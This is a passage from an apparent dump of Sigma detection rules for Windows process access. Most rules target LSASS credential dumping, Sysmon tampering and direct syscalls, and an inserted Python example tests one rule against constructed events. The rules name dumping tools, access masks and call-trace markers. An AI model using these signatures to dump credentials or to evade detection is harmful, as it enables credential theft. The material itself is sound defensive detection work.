'RottenPotato'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml",
    "content": "title: HackTool - HandleKatz Duplicating LSASS Handle\nid: b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5\nstatus: test\ndescription: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles\nreferences:\n    - https://github.com/codewhitesec/HandleKatz\nauthor: Bhabesh Raj (rule), @thefLinkk\ndate: 2022-06-27\nmodified: 2023-11-28\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.defense-evasion\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe' # Theoretically, can be any benign process holding handle to LSASS\n        GrantedAccess: '0x1440' # Only PROCESS_DUP_HANDLE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_QUERY_INFORMATION\n        # Example: C:\\Windows\\SYSTEM32\\ntdll.dll+9d234\\|UNKNOWN(00000000001C119B)\n        CallTrace|startswith: 'C:\\Windows\\System32\\ntdll.dll+'\n        CallTrace|contains: '|UNKNOWN('\n        CallTrace|endswith: ')'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml",
    "content": "title: HackTool - LittleCorporal Generated Maldoc Injection\nid: 7bdde3bf-2a42-4c39-aa31-a92b3e17afac\nstatus: test\ndescription: Detects the process injection of a LittleCorporal generated Maldoc.\nreferences:\n    - https://github.com/connormcgarr/LittleCorporal\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-11-28\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1204.002\n    - attack.t1055.003\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        SourceImage|endswith: '\\winword.exe'\n        CallTrace|contains|all:\n            - ':\\Windows\\Microsoft.NET\\Framework64\\v2.'\n            - 'UNKNOWN'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_sysmonente.yml",
    "content": "title: HackTool - SysmonEnte Execution\nid: d29ada0f-af45-4f27-8f32-f7b77c3dbc4e\nstatus: test\ndescription: Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon\nreferences:\n    - https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html\n    - https://github.com/codewhitesec/SysmonEnte/\n    - https://github.com/codewhitesec/SysmonEnte/blob/fe267690fcc799fbda15398243615a30451d9099/screens/1.png\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2023-11-28\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_sysmon:\n        TargetImage|contains:\n            - ':\\Windows\\Sysmon.exe'\n            - ':\\Windows\\Sysmon64.exe'\n        GrantedAccess: '0x1400'\n    selection_calltrace:\n        CallTrace: 'Ente'\n    filter_main_generic:\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    filter_main_msdefender:\n        SourceImage|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    condition: ( selection_sysmon and not 1 of filter_main_* ) or selection_calltrace\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml",
    "content": "title: Lsass Memory Dump via Comsvcs DLL\nid: a49fa4d5-11db-418c-8473-1e014a8dd462\nstatus: test\ndescription: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.\nreferences:\n    - https://twitter.com/shantanukhande/status/1229348874298388484\n    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-20\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith: '\\rundll32.exe'\n        CallTrace|contains: 'comsvcs.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml",
    "content": "title: LSASS Memory Access by Tool With Dump Keyword In Name\nid: 9bd012ee-0dff-44d7-84a0-aa698cfd87a3\nstatus: test\ndescription: Detects LSASS process access requests from a source process with the \"dump\" keyword in its image name.\nreferences:\n    - https://twitter.com/_xpn_/status/1491557187168178176\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-10\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|contains: 'dump'\n        GrantedAccess|endswith:\n            - '10'\n            - '30'\n            - '50'\n            - '70'\n            - '90'\n            - 'B0'\n            - 'D0'\n            - 'F0'\n            - '18'\n            - '38'\n            - '58'\n            - '78'\n            - '98'\n            - 'B8'\n            - 'D8'\n            - 'F8'\n            - '1A'\n            - '3A'\n            - '5A'\n            - '7A'\n            - '9A'\n            - 'BA'\n            - 'DA'\n            - 'FA'\n            - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n            - 'FF'\n    condition: selection\nfalsepositives:\n    - Rare programs that contain the word dump in their name and access lsass\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_memdump.yml",
    "content": "title: Potential Credential Dumping Activity Via LSASS\nid: 5ef9853e-4d0e-4a70-846f-a9ca37d876da\nstatus: test\ndescription: |\n    Detects process access requests to the LSASS process with specific call trace calls and access masks.\n    This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.\nreferences:\n    - https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md\n    - https://research.splunk.com/endpoint/windows_possible_credential_dumping/\nauthor: Samir Bousseaden, Michael Haag\ndate: 2019-04-03\nmodified: 2024-03-02\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|contains:\n            - '0x1038'\n            - '0x1438'\n            - '0x143a'\n            - '0x1fffff' # Too many false positives\n            # - '0x01000'  # Too many false positives\n            # - '0x1010'   # Too many false positives\n            # - '0x1400'  # Too many false positives\n            # - '0x1410' # Too many false positives\n            # - '0x40'   # Too many false positives\n        CallTrace|contains:\n            - 'dbgcore.dll'\n            - 'dbghelp.dll'\n            - 'kernel32.dll'\n            - 'kernelbase.dll'\n            - 'ntdll.dll'\n    filter_main_system_user:\n        SourceUser|contains: # Covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_optional_thor:\n        CallTrace|contains|all:\n            - ':\\Windows\\Temp\\asgard2-agent\\'\n            - '\\thor\\thor64.exe+'\n            - '|UNKNOWN('\n        GrantedAccess: '0x103800'\n    filter_optional_sysmon:\n        SourceImage|endswith: ':\\Windows\\Sysmon64.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml",
    "content": "title: Credential Dumping Activity By Python Based Tool\nid: f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9\nrelated:\n    - id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0\n      type: obsolete\n    - id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b\n      type: obsolete\nstatus: stable\ndescription: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.\nreferences:\n    - https://twitter.com/bh4b3sh/status/1303674603819081728\n    - https://github.com/skelsec/pypykatz\nauthor: Bhabesh Raj, Jonhnathan Ribeiro\ndate: 2023-11-27\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0349\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains|all:\n            - '_ctypes.pyd+'\n            - ':\\Windows\\System32\\KERNELBASE.dll+'\n            - ':\\Windows\\SYSTEM32\\ntdll.dll+'\n        CallTrace|contains:\n            - 'python27.dll+'\n            - 'python3*.dll+'\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml",
    "content": "title: Remote LSASS Process Access Through Windows Remote Management\nid: aa35a627-33fb-4d04-a165-d33b4afca3e8\nstatus: stable\ndescription: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.\nreferences:\n    - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/\nauthor: Patryk Prauze - ING Tech\ndate: 2019-05-20\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith: ':\\Windows\\system32\\wsmprovhost.exe'\n    filter_main_access:\n        GrantedAccess: '0x80000000'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml",
    "content": "title: Suspicious LSASS Access Via MalSecLogon\nid: 472159c5-31b9-4f56-b794-b766faa8b0a7\nstatus: test\ndescription: Detects suspicious access to LSASS handle via a call trace to \"seclogon.dll\" with a suspicious access right.\nreferences:\n    - https://twitter.com/SBousseaden/status/1541920424635912196\n    - https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml\n    - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html\nauthor: Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith: '\\svchost.exe'\n        GrantedAccess: '0x14c0'\n        CallTrace|contains: 'seclogon.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml",
    "content": "title: Potentially Suspicious GrantedAccess Flags On LSASS\nid: a18dd26b-6450-46de-8c91-9659150cf088\nrelated:\n    - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\n      type: similar\nstatus: test\ndescription: Detects process access requests to LSASS process with potentially suspicious access flags\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community\ndate: 2021-11-22\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_target:\n        TargetImage|endswith: '\\lsass.exe'\n    selection_access:\n        - GrantedAccess|endswith:\n              # - '10'  # covered in rule 678dfc63-fefb-47a5-a04c-26bcf8cc9f65\n              - '30'\n              - '50'\n              - '70'\n              - '90'\n              - 'B0'\n              - 'D0'\n              - 'F0'\n              - '18'\n              - '38'\n              - '58'\n              - '78'\n              - '98'\n              - 'B8'\n              - 'D8'\n              - 'F8'\n              - '1A'\n              - '3A'\n              - '5A'\n              - '7A'\n              - '9A'\n              - 'BA'\n              - 'DA'\n              - 'FA'\n              - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n        - GrantedAccess|startswith:\n              - '0x100000'\n              - '0x1418'    # car.2019-04-004\n              - '0x1438'    # car.2019-04-004\n              - '0x143a'    # car.2019-04-004\n              - '0x1f0fff'\n              - '0x1f1fff'\n              - '0x1f2fff'\n              - '0x1f3fff'\n              - '0x40'\n              # - '0x1000'  # minimum access requirements to query basic info from service\n              # - '0x1010'    # car.2019-04-004\n              # - '0x1400'\n              # - '0x1410'    # car.2019-04-004 # Covered by 678dfc63-fefb-47a5-a04c-26bcf8cc9f65\n    filter_main_generic:\n        # When using this rule. Remove this filter and replace it by the path of the specific AV you use\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    filter_optional_malwarebytes:\n        SourceImage|endswith: ':\\ProgramData\\MALWAREBYTES\\MBAMSERVICE\\ctlrupdate\\mbupdatr.exe'\n    filter_optional_vscode:\n        SourceImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n    filter_main_windefend_1:\n        SourceImage|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    filter_main_windefend_2:\n        CallTrace|contains|all:\n            - '|?:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{'\n            - '}\\mpengine.dll+'\n        GrantedAccess: '0x1418'\n    filter_main_windefend_3:\n        CallTrace|contains:\n            - '|c:\\program files\\windows defender\\mprtp.dll'\n            - '|c:\\program files\\windows defender\\MpClient.dll'\n    filter_optional_vmwaretools:\n        SourceImage|contains: ':\\ProgramData\\VMware\\VMware Tools\\'\n        SourceImage|endswith: '\\vmtoolsd.exe'\n    filter_optional_sysinternals_process_explorer:\n        SourceImage|endswith:\n            - '\\PROCEXP64.EXE'\n            - '\\PROCEXP.EXE'\n        GrantedAccess: '0x40'\n    filter_optional_mbami:\n        SourceImage|endswith: '\\MBAMInstallerService.exe'\n        GrantedAccess: '0x40'\n    filter_optional_nextron:\n        SourceImage|endswith:\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n            - '\\thor.exe'\n            - '\\thor64.exe'\n        GrantedAccess: '0x40'\n    filter_main_explorer:\n        SourceImage|endswith: '\\explorer.exe'\n        GrantedAccess: '0x401'\n    filter_optional_sysinternals_handle:\n        SourceImage|endswith:\n            - '\\handle.exe'\n            - '\\handle64.exe'\n        GrantedAccess: '0x40'\n    filter_optional_webex:\n        SourceImage|endswith: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n        GrantedAccess: '0x401'\n    filter_optional_steam_apps:\n        SourceImage|contains: '\\SteamLibrary\\steamapps\\'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software such as AV and EDR\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_werfault.yml",
    "content": "title: Credential Dumping Attempt Via WerFault\nid: e5b33f7d-eb93-48b6-9851-09e1e610b6d7\nstatus: test\ndescription: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.\nreferences:\n    - https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507\nauthor: Florian Roth (Nextron Systems)\ndate: 2012-06-27\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        SourceImage|endswith: '\\WerFault.exe'\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Actual failures in lsass.exe that trigger a crash dump (unlikely)\n    - Unknown cases in which WerFault accesses lsass.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml",
    "content": "title: LSASS Access From Potentially White-Listed Processes\nid: 4be8b654-0c01-4c9d-a10c-6b28467fc651\nstatus: test\ndescription: |\n    Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference\nreferences:\n    - https://twitter.com/_xpn_/status/1491557187168178176\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz\n    - https://twitter.com/mrd0x/status/1460597833917251595\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-10\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith:\n            - '\\TrolleyExpress.exe'  # Citrix\n            - '\\ProcessDump.exe'     # Cisco Jabber\n            - '\\dump64.exe'          # Visual Studio\n        GrantedAccess|endswith:\n            - '10'\n            - '30'\n            - '50'\n            - '70'\n            - '90'\n            - 'B0'\n            - 'D0'\n            - 'F0'\n            - '18'\n            - '38'\n            - '58'\n            - '78'\n            - '98'\n            - 'B8'\n            - 'D8'\n            - 'F8'\n            - '1A'\n            - '3A'\n            - '5A'\n            - '7A'\n            - '9A'\n            - 'BA'\n            - 'DA'\n            - 'FA'\n            - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n            - 'FF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_susp_all_access_uncommon_target.yml",
    "content": "title: Uncommon Process Access Rights For Target Image\nid: a24e5861-c6ca-4fde-a93c-ba9256feddf0\nstatus: test\ndescription: |\n    Detects process access request to uncommon target images with a \"PROCESS_ALL_ACCESS\" access mask.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.011\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith:\n            # Note: Add additional uncommon targets to increase coverage.\n            - '\\calc.exe'\n            - '\\calculator.exe'\n            - '\\mspaint.exe'\n            - '\\notepad.exe'\n            - '\\ping.exe'\n            - '\\wordpad.exe'\n            - '\\write.exe'\n        GrantedAccess: '0x1FFFFF' # PROCESS_ALL_ACCESS - All possible access rights for a process object.\n    condition: selection\nfalsepositives:\n    - Unknown\n# Note: please upgrade to a higher level after an initial test/tuning.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load.yml",
    "content": "title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs\nid: 9f5c1d59-33be-4e60-bcab-85d2f566effd\nrelated:\n    - id: 416bc4a2-7217-4519-8dc7-c3271817f1d5\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious process access to LSASS.exe from processes located in uncommon locations with dbgcore.dll or dbghelp.dll in the call trace.\n    These DLLs contain functions like MiniDumpWriteDump that can be abused for credential dumping purposes. While modern tools like Mimikatz have moved to using ntdll.dll,\n    dbgcore.dll and dbghelp.dll are still used by basic credential dumping utilities and legacy tools for LSASS memory access and process suspension techniques.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\n    - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_lsass_calltrace:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains:\n            - 'dbgcore.dll'\n            - 'dbghelp.dll'\n    # The following selection is commented out and not enabled by default because any access to LSASS with dbgcore.dll or dbghelp.dll in the call trace from uncommon locations is assumed to be suspicious,\n    # but it may reduce false positives if the rule is too noisy. These GrantedAccess bits are commonly used for dumping LSASS memory.\n    # Uncomment if you observe false positives with the default rule.\n    # selection_granted_access:\n    #     GrantedAccess|contains:\n    #         - '0x1fffff'\n    #         - '0x10'\n    #         - '0x1010'\n    #         - '0x1410'\n    #         - '0x1438'\n    selection_susp_location:\n        SourceImage|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Desktop\\'\n            - '\\Documents\\'\n            - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Possibly during software installation or update processes\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml\n"
  },
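The rule above keys on three things: the target is lsass.exe, a debug-help DLL appears in the call trace, and the source binary lives in a user-writable or otherwise uncommon directory, with an optional GrantedAccess selection held in reserve. The following is an added example, written for this page and not code from the Sigma project, that replays that logic over a handful of constructed Sysmon Event ID 10 records and decodes the GrantedAccess masks named in the commented-out selection, so the reason those particular values were chosen (every one of them carries PROCESS_VM_READ, the right MiniDumpWriteDump needs) is visible. The access-right constants are the documented Win32 process access rights; the events, paths and call traces are made up, and the optional selection is generalised from the rule's literal list to "VM_READ bit set", which is my choice rather than the rule's.

```python
"""Added example (not part of the Sigma project): replay the LSASS/dbghelp rule
over constructed Sysmon EID 10 records and decode GrantedAccess masks."""

# Win32 process access rights (documented constants).
PROCESS_ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF

# Values copied from the rule's selections (lower-cased: Sigma matching is case-insensitive).
DEBUG_DLLS = ("dbgcore.dll", "dbghelp.dll")
SUSP_LOCATIONS = (
    ":\\perflogs\\", ":\\temp\\", ":\\users\\public\\", "\\$recycle.bin\\",
    "\\appdata\\roaming\\", "\\contacts\\", "\\desktop\\", "\\documents\\",
    "\\downloads\\", "\\favorites\\", "\\favourites\\", "\\inetpub\\wwwroot\\",
    "\\music\\", "\\pictures\\", "\\start menu\\programs\\startup\\",
    "\\users\\default\\", "\\videos\\", "\\windows\\temp\\",
)


def decode_granted_access(value: str) -> list[str]:
    """Expand a Sysmon GrantedAccess hex string into named access rights."""
    mask = int(value, 16)
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]


def can_read_memory(value: str) -> bool:
    """True when the handle carries PROCESS_VM_READ (0x10), which a memory dump requires."""
    return bool(int(value, 16) & 0x0010)


def matches_lsass_dbghelp_rule(event: dict, require_vm_read: bool = False) -> bool:
    """require_vm_read stands in for the commented-out GrantedAccess selection,
    generalised to 'VM_READ bit set' (my assumption, not the rule's literal list)."""
    target = event["TargetImage"].lower()
    source = event["SourceImage"].lower()
    trace = event["CallTrace"].lower()
    if not target.endswith("\\lsass.exe"):
        return False
    if not any(dll in trace for dll in DEBUG_DLLS):
        return False
    if not any(loc in source for loc in SUSP_LOCATIONS):
        return False
    if require_vm_read and not can_read_memory(event["GrantedAccess"]):
        return False
    return True


def run_rule(events: list[dict], require_vm_read: bool = False) -> list[str]:
    return [e["id"] for e in events if matches_lsass_dbghelp_rule(e, require_vm_read)]


def trace_via_dbghelp(source: str) -> str:
    """Constructed CallTrace shape: innermost frames in ntdll/kernelbase, then
    dbgcore/dbghelp, then the calling image. Offsets are invented."""
    return ("C:\\Windows\\SYSTEM32\\ntdll.dll+9d5e4|C:\\Windows\\System32\\KERNELBASE.dll+2a2fa|"
            "C:\\Windows\\SYSTEM32\\dbgcore.dll+1f2b3|C:\\Windows\\SYSTEM32\\dbghelp.dll+4a9c1|"
            f"{source}+3a12")


LSASS = "C:\\Windows\\System32\\lsass.exe"
EVENTS = [  # constructed Sysmon EID 10 records, field names as Sysmon emits them
    {"id": "e1", "SourceImage": "C:\\Users\\bob\\Downloads\\pd.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": trace_via_dbghelp("C:\\Users\\bob\\Downloads\\pd.exe")},
    {"id": "e2", "SourceImage": "C:\\Program Files\\Vendor\\agent.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1410", "CallTrace": trace_via_dbghelp("C:\\Program Files\\Vendor\\agent.exe")},
    {"id": "e3", "SourceImage": "C:\\Users\\bob\\Desktop\\setup.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": trace_via_dbghelp("C:\\Users\\bob\\Desktop\\setup.exe")},
    {"id": "e4", "SourceImage": "C:\\Users\\bob\\Desktop\\tool.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d5e4|C:\\Users\\bob\\Desktop\\tool.exe+1c20"},
]

if __name__ == "__main__":
    for v in ("0x10", "0x1010", "0x1410", "0x1438", "0x1fffff"):
        print(v, decode_granted_access(v))
    print("default rule:", run_rule(EVENTS))
    print("with VM_READ requirement:", run_rule(EVENTS, require_vm_read=True))
```

Two things the run makes concrete: e4 (ntdll-only call trace, as the description says modern tooling produces) is never matched, so this rule is deliberately narrow; and e3 (query-only handle, 0x1000) matches the default rule but not the tightened variant. Note also that the commented selection uses `GrantedAccess|contains: '0x10'`, a substring match that would also hit `0x1000` and `0x100`, which is why a bit test is the more precise way to express "can read memory" if you enable it.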
  {
    "path": "rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml",
    "content": "title: Potential Direct Syscall of NtOpenProcess\nid: 3f3f3506-1895-401b-9cc3-e86b16e630d0\nstatus: test\ndescription: Detects potential direct syscalls of NtOpenProcess, i.e. process access whose call trace begins with an unbacked (UNKNOWN) frame instead of the NTDLL stub.\nreferences:\n    - https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6\nauthor: Christian Burkard (Nextron Systems), Tim Shelton (FP)\ndate: 2021-07-28\nmodified: 2023-12-13\ntags:\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        CallTrace|startswith: 'UNKNOWN'\n    filter_main_vcredist:\n        TargetImage|endswith: 'vcredist_x64.exe'\n        SourceImage|endswith: 'vcredist_x64.exe'\n    filter_main_generic:\n        # Examples include \"systeminfo\", \"backgroundTaskHost\", \"AUDIODG\"\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n        TargetImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n    filter_main_kerneltrace_edge:\n        # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from 